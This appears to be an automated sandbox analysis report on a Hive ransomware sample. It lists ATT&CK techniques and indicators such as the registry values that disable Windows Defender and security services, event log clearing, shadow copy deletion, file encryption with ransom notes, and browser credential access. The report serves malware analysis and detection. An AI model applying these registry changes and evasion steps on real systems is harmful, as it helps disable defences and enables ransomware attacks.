hive | d4e8c5cd03b3bfe1743c7e0c82e6c9694e861b2f6907b4fbc11f83bb0623e55e

Windows Service

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs

defense_evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe

Modifies security service 2 TTPs 1 IoCs

defense_evasion

Modify Registry

Windows Service

defense_evasion ransomware

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

Clears Windows event logs 1 TTPs 3 IoCs

Clear Windows Event Logs

T1070.001

pid	Process
400	wevtutil.exe
2432	wevtutil.exe
3576	wevtutil.exe

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
2716	bcdedit.exe
2516	bcdedit.exe

Downloads MZ/PE file 1 IoCs

flow	pid	Process
112	3036	chrome.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation	tor-browser-windows-x86_64-portable-14.0.9.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation	firefox.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation	firefox.exe

Executes dropped EXE 16 IoCs

pid	Process
3416	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
3248	tor-browser-windows-x86_64-portable-14.0.9.exe
3792	firefox.exe
4860	firefox.exe
3100	firefox.exe
3604	firefox.exe
2876	tor.exe
4516	firefox.exe
5128	firefox.exe
2304	firefox.exe
2440	firefox.exe
1964	firefox.exe
4576	firefox.exe
3488	firefox.exe
5204	firefox.exe
4384	firefox.exe

Loads dropped DLL 64 IoCs

pid	Process
3248	tor-browser-windows-x86_64-portable-14.0.9.exe
3248	tor-browser-windows-x86_64-portable-14.0.9.exe
3248	tor-browser-windows-x86_64-portable-14.0.9.exe
3792	firefox.exe
4860	firefox.exe
4860	firefox.exe
4860	firefox.exe
4860	firefox.exe
4860	firefox.exe
4860	firefox.exe
4860	firefox.exe
4860	firefox.exe
4860	firefox.exe
4860	firefox.exe
4860	firefox.exe
4860	firefox.exe
4860	firefox.exe
3100	firefox.exe
3100	firefox.exe
3100	firefox.exe
3100	firefox.exe
3100	firefox.exe
3604	firefox.exe
3604	firefox.exe
3604	firefox.exe
3604	firefox.exe
3604	firefox.exe
4516	firefox.exe
4516	firefox.exe
4516	firefox.exe
4516	firefox.exe
4516	firefox.exe
5128	firefox.exe
5128	firefox.exe
5128	firefox.exe
5128	firefox.exe
5128	firefox.exe
2304	firefox.exe
2304	firefox.exe
2304	firefox.exe
2304	firefox.exe
2304	firefox.exe
2304	firefox.exe
2304	firefox.exe
4516	firefox.exe
4516	firefox.exe
2440	firefox.exe
2440	firefox.exe
2440	firefox.exe
2440	firefox.exe
2440	firefox.exe
1964	firefox.exe
4576	firefox.exe
1964	firefox.exe
1964	firefox.exe
1964	firefox.exe
1964	firefox.exe
4576	firefox.exe
4576	firefox.exe
4576	firefox.exe
4576	firefox.exe
4576	firefox.exe
4576	firefox.exe
1964	firefox.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Checks whether UAC is enabled 1 TTPs 1 IoCs

defense_evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	firefox.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3944	powershell.exe
1792	powershell.exe

Modifies Security services 2 TTPs 6 IoCs

Modifies the startup behavior of a security service.

defense_evasion

Modify Registry

Impair Defenses

T1562

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SecurityHealthService\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SecurityHealthService\Start = "4"	reg.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MSIPC\sr-Latn-RS\msipc.dll.mui.hHsjCx9I1Hx4U3KPZpU6-0EndGmz7Sja4LISwB_5R_z_ugGhtoPeBfk0.vck99	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Fonts\private\LHANDW.TTF.hHsjCx9I1Hx4U3KPZpU6-0EndGmz7Sja4LISwB_5R_z_T7hmqeI1_2M0.vck99	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\FileAssociation\FileAssociation.targetsize-40.png	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\onboarding\contacts_permission_uwp.png	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-96_altform-unplated_contrast-white_devicefamily-colorfulunplated.png	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\de-de\phLK_HOW_TO_DECRYPT.txt	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Logos\SplashScreen\PaintSplashScreen.scale-150.png	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteNotebookSmallTile.scale-400.png	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-32.png	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.contrast-black_targetsize-60.png	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\RTL\contrast-black\SmallTile.scale-100.png	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\Store.Purchase.Component.winmd	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-rdr-de_de.gif.hHsjCx9I1Hx4U3KPZpU6-0EndGmz7Sja4LISwB_5R_z_OM1IQGVXlD00.vck99	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\PowerPoint2019R_Trial-ppd.xrm-ms.hHsjCx9I1Hx4U3KPZpU6-0EndGmz7Sja4LISwB_5R_z_3GdA1ioNaVE0.vck99	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-64_altform-unplated_contrast-white.png	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\de-de\phLK_HOW_TO_DECRYPT.txt	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\legal\javafx\directshow.md.hHsjCx9I1Hx4U3KPZpU6-0EndGmz7Sja4LISwB_5R_z_QHVQBFqQvZA0.vck99	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-16_contrast-black.png	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-white\LargeTile.scale-150_contrast-white.png	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\en-gb\jsaddins\onenote_strings.js	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteSectionGroupSmallTile.scale-150.png	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailBadge.scale-100.png	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Consolas-Verdana.xml.hHsjCx9I1Hx4U3KPZpU6-0EndGmz7Sja4LISwB_5R_z_cj2Tk3-hwbs0.vck99	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_11910.1002.5.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\LibrarySquare71x71Logo.scale-125_contrast-white.png	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\Voices\en-IN\en-IN_female_TTS\ruleset_en-IN_TTS.lua	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Exchange.scale-250.png	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\en-ae\phLK_HOW_TO_DECRYPT.txt	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\illustrations.png.hHsjCx9I1Hx4U3KPZpU6-0EndGmz7Sja4LISwB_5R_z_4ac1sb5__9k0.vck99	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\msadc\ja-JP\msdaremr.dll.mui	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ca-es\phLK_HOW_TO_DECRYPT.txt	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019VL_MAK_AE-ul-oob.xrm-ms.hHsjCx9I1Hx4U3KPZpU6-0EndGmz7Sja4LISwB_5R_z_Dq5MZpXUwbU0.vck99	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.DesktopAppInstaller_1.0.30251.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-white\AppPackageAppList.scale-125_contrast-white.png	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_Skull.png	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-black\LargeTile.scale-150_contrast-black.png	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsWideTile.contrast-white_scale-200.png	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\es-es\ui-strings.js.hHsjCx9I1Hx4U3KPZpU6-0EndGmz7Sja4LISwB_5R_z_6cLYi7Nc8dw0.vck99	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ScreenSketch_10.1907.2471.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\ScreenSketchSplashScreen.scale-125_contrast-white.png	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-256_contrast-white.png	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\EVRGREEN\THMBNAIL.PNG.hHsjCx9I1Hx4U3KPZpU6-0EndGmz7Sja4LISwB_5R_z_6UTOpvMLWJE0.vck99	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\osknav.xml	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Home\contrast-black\SmallTile.scale-200.png	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\move.svg.hHsjCx9I1Hx4U3KPZpU6-0EndGmz7Sja4LISwB_5R_z_JQq2iVZBHEQ0.vck99	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Close.png.hHsjCx9I1Hx4U3KPZpU6-0EndGmz7Sja4LISwB_5R_z_N_RaiNCM4Wo0.vck99	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\ado\msado60.tlb	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsSplashScreen.contrast-black_scale-200.png	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarMediumTile.scale-150.png	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\zh-tw\ui-strings.js.hHsjCx9I1Hx4U3KPZpU6-0EndGmz7Sja4LISwB_5R_z_WIt5cMv34JY0.vck99	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileAcrobatCard_Light.pdf.hHsjCx9I1Hx4U3KPZpU6-0EndGmz7Sja4LISwB_5R_z_xoFVjMp4h3E0.vck99	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-80_altform-unplated_contrast-black.png	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\_Resources\8.rsrc	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\RunningLate.scale-64.png	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\zh-cn\phLK_HOW_TO_DECRYPT.txt	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-16_altform-lightunplated.png	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxSpeechToTextOverlay_1.17.29001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubSmallTile.scale-200.png	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ru-ru\phLK_HOW_TO_DECRYPT.txt	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp4-ul-oob.xrm-ms.hHsjCx9I1Hx4U3KPZpU6-0EndGmz7Sja4LISwB_5R_z_fSy2_x_VYsI0.vck99	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\it-it\ui-strings.js.hHsjCx9I1Hx4U3KPZpU6-0EndGmz7Sja4LISwB_5R_z_ovUzIHx9t2c0.vck99	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\LAYERS\phLK_HOW_TO_DECRYPT.txt	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectProMSDNR_Retail-ul-oob.xrm-ms.hHsjCx9I1Hx4U3KPZpU6-0EndGmz7Sja4LISwB_5R_z_SC6qh4W0Yjc0.vck99	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\Configuration\config.xml.hHsjCx9I1Hx4U3KPZpU6-0EndGmz7Sja4LISwB_5R_z_TpY2_vCogGY0.vck99	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\back-arrow-down.svg.hHsjCx9I1Hx4U3KPZpU6-0EndGmz7Sja4LISwB_5R_z_NflnkfAbZzA0.vck99	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Confirmation.png.hHsjCx9I1Hx4U3KPZpU6-0EndGmz7Sja4LISwB_5R_z_0aAPSXpnl4k0.vck99	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\ipsptb.xml	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneMusic_10.19071.19011.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-black\SplashScreen.scale-125_contrast-black.png	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe

Launches sc.exe 8 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2780	sc.exe
6096	sc.exe
2932	sc.exe
5212	sc.exe
5132	sc.exe
1240	sc.exe
4472	sc.exe
1596	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4548	PING.EXE
1196	cmd.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe

Checks processor information in registry 2 TTPs 10 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
